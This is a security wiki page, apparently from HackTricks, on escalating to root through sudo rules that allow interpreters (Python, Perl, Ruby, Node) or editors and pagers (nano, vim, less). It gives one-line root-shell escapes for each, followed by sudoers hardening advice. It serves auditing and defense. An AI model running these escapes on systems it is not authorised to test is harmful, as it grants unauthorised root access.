sudo-command-abuse.md (5931B)
1 --- 2 title: "Sudo Command Abuse" 3 section: "Linux" 4 sectionSlug: "linux-hardening" 5 sourcePath: "src/linux-hardening/main-system-information/sudo-command-abuse.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/linux-hardening/main-system-information/sudo-command-abuse.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Sudo Command Abuse 14 15 ## Sudo-allowed interpreters 16 17 If `sudo -l` allows a user to run an interpreter as root, treat it as direct code execution. Interpreters are designed to execute arbitrary code, so a rule that allows `python3`, `perl`, `ruby`, `lua`, `node`, or similar binaries is usually equivalent to root command execution unless the arguments are tightly constrained and validated.<sup>[[1]](#references)[[2]](#references)[[3]](#references)[[4]](#references)[[5]](#references)[[7]](#references)[[9]](#references)[[11]](#references)</sup> 18 19 Common review flow: first list the user's privileges, then execute a Python statement with the interpreter's `-c` option.<sup>[[1]](#references)[[3]](#references)[[4]](#references)</sup> 20 21 ```bash 22 sudo -l 23 sudo /usr/bin/python3 -c 'import os; os.system("id")' 24 sudo /usr/bin/python3 -c 'import os; os.system("/bin/sh")' 25 ``` 26 27 Other interpreter examples are shown below; the listed interpreters document inline-code execution or child-process APIs.<sup>[[5]](#references)[[6]](#references)[[7]](#references)[[8]](#references)[[9]](#references)[[10]](#references)[[11]](#references)</sup> 28 29 ```bash 30 sudo /usr/bin/perl -e 'exec "/bin/sh";' 31 sudo /usr/bin/ruby -e 'exec "/bin/sh"' 32 sudo /usr/bin/node -e 'require("child_process").spawn("/bin/sh", {stdio: [0,1,2]})' 33 ``` 34 35 The exact path matters. If the sudo rule allows `/usr/bin/python3`, use that exact path during validation.<sup>[[2]](#references)</sup> 36 37 ```bash 38 sudo /usr/bin/python3 -c 'import os; os.setuid(0); os.setgid(0); os.system("/bin/sh")' 39 ``` 40 41 ## Sudo-allowed editors 42 43 If `sudo -l` allows a user to run an interactive editor as root, treat it as a command-execution surface, not as a harmless file-editing permission. Editors can often execute shell commands, read arbitrary files, write arbitrary files, or invoke external helpers from inside the editor.<sup>[[1]](#references)[[12]](#references)[[13]](#references)[[14]](#references)</sup> 44 45 Common review flow: list the user's privileges, then invoke each allowed editor or pager under sudo.<sup>[[1]](#references)[[12]](#references)[[13]](#references)[[14]](#references)</sup> 46 47 ```bash 48 sudo -l 49 sudo /usr/bin/nano /etc/hosts 50 sudo /usr/bin/vim /etc/hosts 51 sudo /usr/bin/less /etc/hosts 52 ``` 53 54 ### Nano command execution 55 56 When `nano` is allowed through sudo, command execution may be reachable from the editor interface.<sup>[[12]](#references)</sup> 57 58 ```text 59 Ctrl+R 60 Ctrl+X 61 ``` 62 63 Then provide a command such as `id` or `/bin/sh` to the nano command prompt.<sup>[[12]](#references)</sup> 64 65 ```bash 66 id 67 /bin/sh 68 ``` 69 70 If an interactive shell does not have usable terminal streams, this redirection form maps its standard output and error to descriptor 0.<sup>[[15]](#references)</sup> 71 72 ```bash 73 reset; /bin/sh 1>&0 2>&0 74 ``` 75 76 The exact key sequence can vary with nano version and build options, but the security issue is the same: the editor is running as root and can invoke external commands.<sup>[[1]](#references)[[12]](#references)</sup> 77 78 ### Other common editor escapes 79 80 Vim-style editors commonly expose command execution through `:!`.<sup>[[13]](#references)</sup> 81 82 ```text 83 :!/bin/sh 84 ``` 85 86 Pagers such as `less` can also expose shell execution.<sup>[[14]](#references)</sup> 87 88 ```text 89 !/bin/sh 90 ``` 91 92 ## Defensive notes 93 94 - Avoid granting interpreters or interactive editors through sudo.<sup>[[1]](#references)</sup> 95 - Prefer fixed, root-owned wrappers that perform one narrow administrative action.<sup>[[1]](#references)[[2]](#references)</sup> 96 - If an interpreter is unavoidable, restrict the exact script path and prevent user-controlled arguments, writable imports, `PYTHONPATH`, and unsafe environment preservation.<sup>[[2]](#references)[[3]](#references)[[4]](#references)</sup> 97 - If file editing is required, restrict the exact file path and consider `sudoedit` with patched sudo versions and strict environment handling.<sup>[[1]](#references)[[2]](#references)</sup> 98 - Review `SETENV`, `env_keep`, writable working directories, writable module/import paths, `NOEXEC`, `use_pty`, and logging, but do not treat them as a complete sandbox.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup> 99 100 ## References 101 102 - [1] [sudo(8) — Linux manual page](https://man7.org/linux/man-pages/man8/sudo.8.html) 103 - [2] [sudoers(5) — Linux manual page](https://man7.org/linux/man-pages/man5/sudoers.5.html) 104 - [3] [Command line and environment — Python documentation](https://docs.python.org/3/using/cmdline.html) 105 - [4] [os — Miscellaneous operating system interfaces — Python documentation](https://docs.python.org/3/library/os.html) 106 - [5] [perlrun — how to execute the Perl interpreter](https://perldoc.perl.org/perlrun) 107 - [6] [exec — Perl documentation](https://perldoc.perl.org/functions/exec) 108 - [7] [Ruby command-line options](https://ruby-doc.org/3.4/ruby/options_md.html) 109 - [8] [Kernel — Ruby documentation](https://ruby-doc.org/3.4/Kernel.html) 110 - [9] [Command-line API — Node.js documentation](https://nodejs.org/api/cli.html) 111 - [10] [Child process — Node.js documentation](https://nodejs.org/api/child_process.html) 112 - [11] [Lua 5.4 lua man page](https://www.lua.org/manual/5.4/lua.html) 113 - [12] [The GNU nano text editor](https://nano-editor.org/manual.html) 114 - [13] [Vim: usr_21.txt](https://vimhelp.org/usr_21.txt.html) 115 - [14] [less(1) — Linux manual page](https://man7.org/linux/man-pages/man1/less.1.html) 116 - [15] [Redirections — Bash Reference Manual](https://www.gnu.org/s/bash/manual/html_node/Redirections.html)